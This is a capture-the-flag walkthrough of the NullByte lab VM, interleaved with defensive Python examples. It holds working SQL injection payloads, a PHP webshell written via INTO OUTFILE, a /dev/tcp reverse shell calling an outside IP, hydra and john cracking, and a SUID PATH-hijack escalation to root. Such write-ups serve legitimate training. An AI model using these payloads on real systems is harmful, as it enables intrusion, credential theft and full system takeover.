Information gathering
First, port-scan the target host:
```
┌──(root㉿LAPTOP-AVRKN16D)-[~]
└─# nmap --min-rate 10000 -p- -oA nullbyteports 10.192.95.89
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:00 CST
Nmap scan report for 10.192.95.89
Host is up (0.016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
38590/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds
```
With the open ports known, run a TCP service and version scan against just those ports:
```
┌──(root㉿LAPTOP-AVRKN16D)-[~]
└─# nmap -sT -sC -sV -O -p80,111,777,38590 -oA nullbytetcp 10.192.95.89
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:05 CST
NSOCK ERROR [17.2990s] mksock_bind_addr(): Bind to 0.0.0.0:999 failed (IOD #38): Address already in use (98)
NSOCK ERROR [17.3220s] mksock_bind_addr(): Bind to 0.0.0.0:954 failed (IOD #40): Address already in use (98)
Nmap scan report for 10.192.95.89
Host is up (0.00091s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38590/tcp   status
|   100024  1          49204/tcp6  status
|   100024  1          54856/udp6  status
|_  100024  1          56022/udp   status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
38590/tcp open  status  1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (97%), Linux 3.10 - 4.11 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (94%), Sony Android TV (Android 5.0) (93%), Android 5.1 (93%), Linux 3.2 - 3.16 (93%), Android 4.0 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds
```
Run a UDP scan against the same ports:
```
┌──(root㉿LAPTOP-AVRKN16D)-[~]
└─# nmap -sU -p80,111,777,38590 -oA nullbyteudp 10.192.95.89
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 19:07 CST
Nmap scan report for 10.192.95.89
Host is up (0.0012s latency).

PORT      STATE  SERVICE
80/udp    closed http
111/udp   open   rpcbind
777/udp   closed multiling-http
38590/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
```
Probing port 80
View the site's page source and download the image it references.
Before doing anything further with the image, brute-force the site's directories; here we use gobuster:
```
┌──(root㉿kali)-[~/Desktop]
└─# gobuster dir -u http://10.192.95.89 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.192.95.89
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/04/24 07:12:41 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.192.95.89/uploads/]
/javascript           (Status: 301) [Size: 317] [--> http://10.192.95.89/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://10.192.95.89/phpmyadmin/]
/server-status        (Status: 403) [Size: 300]
Progress: 220331 / 220561 (99.90%)
===============================================================
2023/04/24 07:16:17 Finished
===============================================================
```
Inspect the image's metadata with exiftool:
```
┌──(root㉿kali)-[~/Desktop]
└─# exiftool main.gif
ExifTool Version Number         : 12.57
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:01 12:39:30-04:00
File Access Date/Time           : 2023:04:24 07:10:23-04:00
File Inode Change Date/Time     : 2023:04:24 07:10:23-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071
```
The Comment field contains a string.
Browsing the paths found by gobuster turned up nothing useful. After several tries, we entered the string from the Comment field as a path in the site URL, and it responded.
Looking at that page's source, a comment further down hints that the password is weak, so in the next step hydra can be used to brute-force it:
```
┌──(root㉿LAPTOP-AVRKN16D)-[~]
└─# hydra 10.192.95.89 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l hzh -P /usr/share/wordlists/rockyou.txt
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-24 19:35:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.192.95.89:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4159.00 tries/min, 4159 tries in 00:01h, 14340240 to do in 57:29h, 16 active
[STATUS] 4385.67 tries/min, 13157 tries in 00:03h, 14331242 to do in 54:28h, 16 active
[80][http-post-form] host: 10.192.95.89   login: hzh   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-24 19:41:31
```
After entering the password, there is another form.
Entering a `"` in the form returns a page with a SQL syntax error, so it is reasonable to infer that this is a SQL injection point.
SQL injection
Method 1: injection with sqlmap
```
┌──(root㉿kali)-[~/Desktop]
└─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -dbs --batch
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
```
There is a database named seth; next we enumerate it:
```
┌──(root㉿kali)-[~/Desktop]
└─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth --tables --batch
Database: seth
[1 table]
+-------+
| users |
+-------+
```
It contains a table named users; next we enumerate that table's columns:
```
┌──(root㉿kali)-[~/Desktop]
└─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth -T users -columns --batch
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| position | text        |
| user     | text        |
| id       | smallint(6) |
| pass     | text        |
+----------+-------------+
```
Dump the data to see what the users table contains:
```
┌──(root㉿kali)-[~/Desktop]
└─# sqlmap -u "http://10.192.95.89/kzMb5nVYJw/420search.php?usrtosearch=hzh" -dbms mysql -D seth -T users --dump --batch
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+
```
Method 2: manual injection
First determine how many columns the query returns, either with a UNION SELECT or with ORDER BY:
```sql
" union select 1,2,3;-- -
" order by 3;-- -
```
When the UNION SELECT or ORDER BY is pushed to a fourth column the page returns an error, so the query returns three columns.
Next, use the following payload to probe the current database:
```sql
" union select database(),@@version,user();-- -
```
This shows that the current database is seth and that the connection runs as the root user.
Next, read the contents of the seth database. First enumerate its tables:
```sql
" union select table_schema,table_name,3 from information_schema.tables;-- -
" union select table_name,2,3 from information_schema.tables where table_schema="seth";-- -
```
The seth database has a users table; now enumerate the columns of seth.users:
```sql
" union select column_name,2,3 from information_schema.columns where table_schema="seth" and table_name="users";-- -
```
The columns are id, user, pass and position; all that remains is to read them out.
From the earlier output we already know the results come from the seth database, so the table can be queried directly:
```sql
" union select id,user,pass from users;-- -
```
The data is read successfully.
Method 3: writing a command-execution file
```sql
" union select "<?php system($_GET['hzh']);?>","","" into outfile "/var/www/html/uploads/hzh.php";-- -
```
After the injection succeeds, recall that the directory brute-force found an uploads folder; now request hzh.php in that folder:
```
┌──(root㉿kali)-[~/Desktop]
└─# curl http://10.192.95.89/uploads/hzh.php?hzh=cat%20/etc/passwd
1	ramses	
2	isis	employee
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
```
Command execution works.
Looking at the source around the injection point, the GET request is handled by 420search.php, which talks to the database, so let's see what 420search.php contains:
```
┌──(root㉿kali)-[~/Desktop]
└─# curl http://10.192.95.89/uploads/hzh.php?hzh=cat%20/var/www/html/kzMb5nVYJw/420search.php
1	ramses	
2	isis	employee
<?php
$word = $_GET["usrtosearch"];
$dbhost = 'localhost:3036';
$dbuser = 'root';
$dbpass = 'sunnyvale';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn ) {
    die('Could not connect: ' . mysql_error());
}
$sql = 'SELECT id, user, position FROM users WHERE user LIKE "%'.$word.'%" ';
mysql_select_db('seth');
$retval = mysql_query( $sql, $conn );
if(! $retval ) {
    die('Could not get data: ' . mysql_error());
}
while($row = mysql_fetch_array($retval, MYSQL_ASSOC)) {
    echo "EMP ID :{$row['id']} <br> ".
         "EMP NAME : {$row['user']} <br> ".
         "EMP POSITION : {$row['position']} <br> ".
         "--------------------------------<br>";
}
echo "Fetched data successfully\n";
mysql_close($conn);
```
The database account and password are visible here; they can be used to log into the phpMyAdmin management interface and view the data directly.
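The manual UNION injection in Method 2 and the 420search.php source above come down to the same defect: the search term is spliced into the SQL text, so `"` ends the LIKE literal and whatever follows is parsed as SQL. The following Python is an added example, not the box's code: it reproduces the query against an in-memory SQLite table standing in for seth.users (rows copied from the sqlmap dump), runs a UNION payload through the unsafe string builder, and shows the parameterized form with LIKE metacharacters escaped. It uses single-quoted string literals, where the original PHP used double quotes; the mechanism is identical.

```python
import sqlite3

# Constructed stand-in for seth.users (values from the sqlmap dump above).
# This is an in-memory SQLite database, not the target's MySQL server.
USERS = [
    (1, "ramses", "", "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"),
    (2, "isis", "employee", "--not allowed--"),
]

# Same shape as the page's payload, quoted for SQLite's single-quote literals.
PAYLOAD = "%' UNION SELECT id, user, pass FROM users -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, position TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def search_unsafe(conn, word):
    # Mirrors 420search.php: the user-supplied word becomes part of the SQL text.
    sql = "SELECT id, user, position FROM users WHERE user LIKE '%" + word + "%'"
    return conn.execute(sql).fetchall()


def escape_like(word):
    # Escape LIKE metacharacters so input cannot widen the pattern either.
    return word.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, word):
    # Parameterized: the word is bound as a value and can never be parsed as SQL.
    sql = "SELECT id, user, position FROM users WHERE user LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escape_like(word) + "%",)).fetchall()


def leaked_hash(rows):
    # True if the pass column of ramses shows up where position should be.
    return any(r[2] == USERS[0][3] for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", search_unsafe(db, PAYLOAD))
    print("safe:  ", search_safe(db, PAYLOAD))
```

The unsafe builder returns the original rows plus a second set in which the pass column has been unioned into the position slot, exactly what the page's `" union select id,user,pass from users;-- -` produced on the box; the parameterized query treats the whole payload as a name to search for and returns nothing. The ESCAPE clause is the part most people forget: without it, a bound `%` still turns the search into "match everything".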
Method 4: writing a reverse shell
```sql
" union select "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.129/4444 0>&1'\");?>","","" into outfile "/var/www/html/uploads/nan.php";-- -
```
Hash cracking
The value YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE obtained above clearly looks base64-encoded. Decode it first; the result is another string that looks like a hash. Identify the hash algorithm, then brute-force it with John:
```
┌──(root㉿kali)-[~/Desktop]
└─# echo -n "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

┌──(root㉿kali)-[~/Desktop]
└─# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\     \ \ \   \ \ \ \ \        #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \     \_\ \__ \ \ \_\ \       #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\    /\_____\ \ \____/       #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/    \/_____/  \/___/  v1.2  #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: c6d6bd7ebf806f43c76acc3681703b81

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

┌──(root㉿kali)-[~/Desktop]
└─# echo "c6d6bd7ebf806f43c76acc3681703b81" > hzh.txt

┌──(root㉿kali)-[~/Desktop]
└─# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hzh.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
omega            (?)
1g 0:00:00:00 DONE (2023-04-24 08:48) 50.00g/s 576000p/s 576000c/s 576000C/s merda..snuffy
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
```
The password is now known to be omega and the account is ramses.
Connect to the host over SSH:
```
ssh ramses@10.192.95.89 -p 777
```
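As an added example that is not part of the original writeup, the Python below reproduces the decode-and-identify steps above and then shows the storage that would have made the dumped value useless. It re-adds the base64 padding whose absence made `base64 -d` complain, classifies the 32-hex-character result as MD5 by length (the same heuristic hash-identifier uses), confirms the cracked password against it, and contrasts that with salted, iterated PBKDF2-HMAC-SHA256. The `pbkdf2_sha256$iterations$salt$dk` record format is my own choice for the example.

```python
import base64
import hashlib
import hmac
import os
import re

# Value copied from the sqlmap dump of seth.users above.
STORED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"


def b64_decode_lenient(s):
    # The dump is missing its trailing '=' padding, which is why base64 -d
    # printed "invalid input" after emitting the bytes; restore it first.
    padded = s + "=" * (-len(s) % 4)
    return base64.b64decode(padded).decode("ascii")


def classify_digest(hexstr):
    # Length-based guess only: 32 hex chars is consistent with MD5 (or any
    # other 128-bit digest), which is all hash-identifier can say as well.
    if not re.fullmatch(r"[0-9a-fA-F]+", hexstr):
        return "not hex"
    return {32: "MD5", 40: "SHA-1", 64: "SHA-256"}.get(len(hexstr), "unknown")


def is_unsalted_md5_of(hexstr, candidate):
    # An unsalted MD5 can be checked against a guess with one digest call,
    # which is exactly why a wordlist run finished in under a second.
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, hexstr.lower())


def hash_password(password, salt=None, iterations=600_000):
    # Defensive replacement: per-user random salt and a deliberately slow KDF.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    digest = b64_decode_lenient(STORED)
    print(digest, classify_digest(digest), is_unsalted_md5_of(digest, "omega"))
    print(hash_password("omega"))
```

Two records produced for the same password differ because of the fresh salt, so a dumped table can no longer be attacked with one precomputed wordlist pass, and each guess costs hundreds of thousands of HMAC iterations instead of one MD5 block.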
Privilege escalation
First run sudo -l to check for any privileged operations:
```
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
```
There are none, so the next idea is to escalate through a SUID binary; search the whole filesystem first:
```
ramses@NullByte:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
ramses@NullByte:~$
```
Look at the file in /var/www/backup:
```
ramses@NullByte:/var/www/backup$ ls -al
total 20
drwxrwxrwx 2 root   root   4096 Apr 25 04:57 .
drwxr-xr-x 4 root   root   4096 Aug  2  2015 ..
-rwsr-xr-x 1 root   root   4932 Aug  2  2015 procwatch
lrwxrwxrwx 1 ramses ramses    7 Apr 25 04:57 ps -> /bin/sh
-rw-r--r-- 1 root   root     28 Aug  2  2015 readme.txt
ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1945 pts/1    00:00:00 procwatch
 1946 pts/1    00:00:00 sh
 1947 pts/1    00:00:00 ps
ramses@NullByte:/var/www/backup$
```
Running it shows that it spawns sh and then ps, so either of those two names can be used for the escalation.
We chose ps: create a symlink named ps pointing to /bin/sh, then change PATH so that command lookup starts in the current directory.
```
ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps
ramses@NullByte:/var/www/backup$ ls -al
total 20
drwxrwxrwx 2 root   root   4096 Apr 25 04:57 .
drwxr-xr-x 4 root   root   4096 Aug  2  2015 ..
-rwsr-xr-x 1 root   root   4932 Aug  2  2015 procwatch
lrwxrwxrwx 1 ramses ramses    7 Apr 25 04:57 ps -> /bin/sh
-rw-r--r-- 1 root   root     28 Aug  2  2015 readme.txt
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1945 pts/1    00:00:00 procwatch
 1946 pts/1    00:00:00 sh
 1947 pts/1    00:00:00 ps
ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps
ln: failed to create symbolic link ‘ps’: File exists
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
#
```
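The procwatch escalation works for two reasons that are visible in the listing above: the SUID binary runs ps by bare name rather than by absolute path, and it inherits the caller's PATH, so a world-writable directory that is also first in PATH decides which ps runs. The Python below is an added example and not the box's code. It builds a throwaway directory standing in for /var/www/backup containing a file named ps, shows that a PATH beginning with "." resolves the bare name into that directory while a fixed absolute PATH does not, and shows the environment a privileged helper should construct before exec. SAFE_PATH and the temporary directory are constructed values.

```python
import os
import shutil
import tempfile

# Constructed fixed search path a privileged helper should use instead of
# whatever PATH its caller hands it.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# Environment variables that must never be inherited across a privilege boundary.
DANGEROUS_ENV = ("PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "IFS")


def setup_writable_dir():
    # Stand-in for /var/www/backup: a directory the unprivileged user can write
    # to, holding a file named ps (the page used a symlink to /bin/sh).
    d = tempfile.mkdtemp(prefix="backup-")
    fake = os.path.join(d, "ps")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho fake ps\n")
    os.chmod(fake, 0o755)
    return d


def resolve_from(cwd, name, path):
    # Resolve a bare command name the way the shell does, with cwd as the
    # process's working directory so a "." entry in PATH means cwd.
    prev = os.getcwd()
    os.chdir(cwd)
    try:
        found = shutil.which(name, path=path)
    finally:
        os.chdir(prev)
    if found is None:
        return None
    return os.path.abspath(os.path.join(cwd, found))


def hijacked(name, cwd, path):
    # True when the bare name resolves into cwd: the procwatch failure mode.
    resolved = resolve_from(cwd, name, path)
    return resolved is not None and os.path.dirname(resolved) == os.path.abspath(cwd)


def hardened_env(base=None):
    # What a SUID wrapper should do before exec: drop inherited loader and
    # lookup variables and install a fixed PATH.
    base = os.environ if base is None else base
    env = {k: v for k, v in base.items() if k not in DANGEROUS_ENV}
    env["PATH"] = SAFE_PATH
    return env


if __name__ == "__main__":
    d = setup_writable_dir()
    print("PATH=.:...  ->", resolve_from(d, "ps", ".:" + SAFE_PATH))
    print("fixed PATH  ->", resolve_from(d, "ps", SAFE_PATH))
    print("hardened PATH:", hardened_env()["PATH"])
```

The `find / -perm -u=s` sweep on the page is the detection side of the same problem: any SUID binary outside the distribution's package set, and any SUID binary sitting in a directory that is writable by others (`drwxrwxrwx` above), deserves to be read with exactly this question in mind.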